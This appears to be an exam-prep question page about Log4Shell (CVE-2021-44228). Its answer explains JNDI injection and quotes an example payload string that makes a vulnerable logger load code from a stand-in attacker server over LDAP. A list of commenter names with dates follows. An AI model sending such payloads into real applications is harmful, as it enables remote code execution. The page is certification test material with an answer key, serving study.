In the context of the infamous log4j vulnerability (CVE-2021-44228), which vulnerability is exploited in the backend to achieve Remote Code Execution?
The Log4j vulnerability, identified as CVE-2021-44228 (commonly known as Log4Shell), is a critical security flaw in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability allows remote code execution (RCE) when an attacker crafts a malicious input (e.g., ${jndi:ldap://malicious.com/a}) that is logged by a vulnerable Log4j instance. The exploit leverages JNDI (Java Naming and Directory Interface) Injection, where the JNDI lookup mechanism is abused to load remote code from an attacker-controlled server. All options (A, B, and C) list 'JNDI Injection,' which is correct, but since B is marked as the selected answer in the image, it is taken as the intended choice. This redundancy in options suggests a possible error in the question design, but the vulnerability is unequivocally JNDI Injection. Option D ('None of the above') is incorrect as JNDI Injection is the exploited vulnerability. This topic is critical in the CAP syllabus under injection attacks and RCE prevention.
Edwin
3 months agoBeckie
4 months agoErnest
4 months agoCristy
4 months agoLea
4 months agoJoni
5 months agoColby
5 months agoGregoria
5 months agoMarti
5 months agoJoye
6 months agoRory
6 months agoNoah
6 months agoXochitl
6 months agoRosita
6 months agoMichael
9 months agoRonald
9 months agoAhmed
9 months agoKami
7 months agoJennifer
8 months agoMarguerita
8 months agoCarmela
8 months agoSanda
9 months agoBettyann
9 months agoLonny
8 months agoWava
8 months agoAmie
9 months agoMarva
9 months agoMerissa
9 months agoReta
9 months agoFausto
9 months agoMing
9 months agoLouvenia
10 months ago